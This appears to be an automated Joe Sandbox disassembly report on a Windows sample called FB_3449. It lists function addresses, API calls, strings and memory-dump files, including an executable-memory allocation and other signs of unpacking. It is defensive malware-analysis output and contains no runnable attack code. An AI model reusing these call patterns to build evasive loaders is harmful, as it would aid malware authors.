Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00442081
Part of subcall function 00441F3C: SetErrorMode.KERNEL32(?,004420A9,00008000), ref: 0044209C

Part of subcall function 00454694: GetKeyboardLayout.USER32(00000000), ref: 004546D9
Part of subcall function 00454694: GetDC.USER32(00000000), ref: 0045472E
Part of subcall function 00454694: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00454738
Part of subcall function 00454694: ReleaseDC.USER32(00000000,00000000), ref: 00454743

Part of subcall function 00455778: LoadIconA.USER32(00400000,MAINICON), ref: 0045585D
Part of subcall function 00455778: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00442448,00000000,00000000,?,?,00000000,004424B0), ref: 0045588F
Part of subcall function 00455778: OemToCharA.USER32(?,?), ref: 004558A2
Part of subcall function 00455778: CharLowerA.USER32(?), ref: 004558E2

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442477
GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442488

Strings

ControlOfs%.8X%.8X, xrefs: 004423BB
USER32, xrefs: 00442472
Delphi%.8X, xrefs: 0044236A
AnimateWindow, xrefs: 00442482

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00455778, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 0045585D
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00442448,00000000,00000000,?,?,00000000,004424B0), ref: 0045588F
OemToCharA.USER32(?,?), ref: 004558A2
CharLowerA.USER32(?), ref: 004558E2

Part of subcall function 00455A80: GetClassInfoA.USER32(00400000,00455768,?), ref: 00455AD5
Part of subcall function 00455A80: RegisterClassA.USER32(0045CC38), ref: 00455AED
Part of subcall function 00455A80: SetWindowLongA.USER32(0000000E,000000FC,10800000), ref: 00455B89
Part of subcall function 00455A80: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455BAB
Part of subcall function 00455A80: SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 00455BBE
Part of subcall function 00455A80: GetSystemMenu.USER32(0000000E,00000000), ref: 00455BC9
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00455BD8
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F000,00000000), ref: 00455BE5
Part of subcall function 00455A80: DeleteMenu.USER32(00000000,0000F010,00000000), ref: 00455BFC

Strings

MAINICON, xrefs: 00455850
4@F, xrefs: 004558FD
,@F, xrefs: 00455855, 00455887

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00401A54, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48

APIs

RtlInitializeCriticalSection.KERNEL32(004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A6A
RtlEnterCriticalSection.KERNEL32(004645C4,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A7D
LocalAlloc.KERNEL32(00000000,00000FF8,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401AA7
RtlLeaveCriticalSection.KERNEL32(004645C4,00401B11,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401B04

Strings

M!, xrefs: 00401A5A

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0045B894, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28

APIs

GetConsoleCP.KERNEL32 ref: 0045B898
GetVersion.KERNEL32 ref: 0045B8AF
OutputDebugStringA.KERNEL32(XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH), ref: 0045B8BE

Part of subcall function 0045B794: VirtualAlloc.KERNEL32(00000000,000065E4,00003000,00000040), ref: 0045B7ED
Part of subcall function 0045B794: GetConsoleCP.KERNEL32 ref: 0045B84B

Strings

XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH, xrefs: 0045B8B9
Z5, xrefs: 0045B8A1

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0044256C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34

APIs

GetVersion.KERNEL32(00000000,004425F2), ref: 00442586

Part of subcall function 00442338: GetCurrentProcessId.KERNEL32(?,00000000,004424B0), ref: 00442359
Part of subcall function 00442338: GlobalAddAtomA.KERNEL32(00000000), ref: 0044238C
Part of subcall function 00442338: GetCurrentThreadId.KERNEL32(?,?,00000000,004424B0), ref: 004423A7
Part of subcall function 00442338: GlobalAddAtomA.KERNEL32(00000000), ref: 004423DD
Part of subcall function 00442338: RegisterClipboardFormatA.USER32(00000000), ref: 004423F3
Part of subcall function 00442338: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442477
Part of subcall function 00442338: GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,004424B0), ref: 00442488

Strings

H&D, xrefs: 004425CA
l'D, xrefs: 004425DA
*C, xrefs: 004425A0, 004425AA, 004425B4, 004425C4, 004425D4

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00426474, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

GetSystemMetrics.USER32(?), ref: 004264D6

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

KiUserApcDispatcher.NTDLL(?), ref: 0042649C

Strings

GetSystemMetrics, xrefs: 00426484

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00402140, Relevance: 3.1, APIs: 2, Instructions: 124

APIs

RtlEnterCriticalSection.KERNEL32(004645C4,00000000,004022BC), ref: 0040218B
RtlLeaveCriticalSection.KERNEL32(004645C4,004022C3), ref: 004022B6

Part of subcall function 00401A54: RtlInitializeCriticalSection.KERNEL32(004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A6A
Part of subcall function 00401A54: RtlEnterCriticalSection.KERNEL32(004645C4,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A7D
Part of subcall function 00401A54: LocalAlloc.KERNEL32(00000000,00000FF8,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401AA7
Part of subcall function 00401A54: RtlLeaveCriticalSection.KERNEL32(004645C4,00401B11,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401B04

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0040156C, Relevance: 2.5, APIs: 2, Instructions: 37

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401875), ref: 0040159B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401875), ref: 004015C2

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00406420, Relevance: 1.5, APIs: 1, Instructions: 31

APIs

LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004070FE, Relevance: 1.5, APIs: 1, Instructions: 28

APIs

CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00407100, Relevance: 1.5, APIs: 1, Instructions: 27

APIs

CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00405908, Relevance: 1.5, APIs: 1, Instructions: 26

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?,00000400,?,004101C4,00413D13,00000000,00413D38), ref: 00405926

Part of subcall function 00405B44: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?), ref: 00405B60
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001), ref: 00405B7E
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C), ref: 00405B9C
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405BBA
Part of subcall function 00405B44: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405C03
Part of subcall function 00405B44: RegQueryValueExA.ADVAPI32(?,00405DB0,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001), ref: 00405C21
Part of subcall function 00405B44: RegCloseKey.ADVAPI32(?,00405C50,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405C43
Part of subcall function 00405B44: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
Part of subcall function 00405B44: GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
Part of subcall function 00405B44: GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
Part of subcall function 00405B44: lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00455F14, Relevance: 1.5, APIs: 1, Instructions: 24

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00455F3E

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00401700, Relevance: 1.3, APIs: 1, Instructions: 54

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0040176D

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0041C830, Relevance: 1.3, APIs: 1, Instructions: 52

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004013C8, Relevance: 1.3, APIs: 1, Instructions: 34

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,004645F4,0040142B,?,?,004014CB,?,?,?,00000000,00004003,00401A0B), ref: 004013DB

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 002F3AAE, Relevance: 1.3, APIs: 1, Instructions: 12

APIs

CloseHandle.KERNEL32 ref: 002F3AB2

Memory Dump Source

Source File: 00000005.00000002.254310386.002F0000.00000040.sdmp, Offset: 002F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f0000_FB_3449.jbxd

Non-executed Functions

Function 00441F3C, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95

APIs

SetErrorMode.KERNEL32(00008000), ref: 00441F55
GetModuleHandleA.KERNEL32(USER32,00000000,004420A2,?,00008000), ref: 00441F79
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,004420A2,?,00008000), ref: 00441F86
LoadLibraryA.KERNEL32(IMM32.DLL), ref: 00441FA2
GetProcAddress.KERNEL32(00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FC4
GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FD9
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FEE
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442003
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442018
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2), ref: 0044202D
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000), ref: 00442042
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00442057
GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0044206C
GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00442081
SetErrorMode.KERNEL32(?,004420A9,00008000), ref: 0044209C

Strings

ImmGetConversionStatus, xrefs: 00441FE3
ImmGetContext, xrefs: 00441FB9
ImmSetConversionStatus, xrefs: 00441FF8
ImmReleaseContext, xrefs: 00441FCE
ImmGetCompositionStringA, xrefs: 0044204C
ImmSetCompositionFontA, xrefs: 00442037
ImmSetCompositionWindow, xrefs: 00442022
USER32, xrefs: 00441F74
IMM32.DLL, xrefs: 00441F9D
WINNLSEnableIME, xrefs: 00441F80
ImmNotifyIME, xrefs: 00442076
ImmSetOpenStatus, xrefs: 0044200D
ImmIsIME, xrefs: 00442061

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 0040598C, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004059A9
GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059BA
lstrcpyn.KERNEL32(?,?,?,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059EA
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405A4E

Part of subcall function 00405978: CharNextA.USER32(?), ref: 0040597B

lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001), ref: 00405A83
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49), ref: 00405A96
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000), ref: 00405AA3
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC), ref: 00405AAF
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405AE3
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405AEF
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405B11

Strings

\, xrefs: 00405AC1
kernel32.dll, xrefs: 004059A4
GetLongPathNameA, xrefs: 004059B4

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00453090, Relevance: 18.4, APIs: 12, Instructions: 407

APIs

Part of subcall function 00457668: IsChild.USER32(00000000,00000000), ref: 004576C6

SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00453411
ShowWindow.USER32(00000000,00000003), ref: 00453421
ShowWindow.USER32(00000000,00000002), ref: 00453443
CallWindowProcA.USER32(00406BD0,00000000,00000005,00000000,?), ref: 0045346C
SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00453491
ShowWindow.USER32(00000000,?), ref: 004534B6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 0045354F
GetActiveWindow.USER32 ref: 00453562
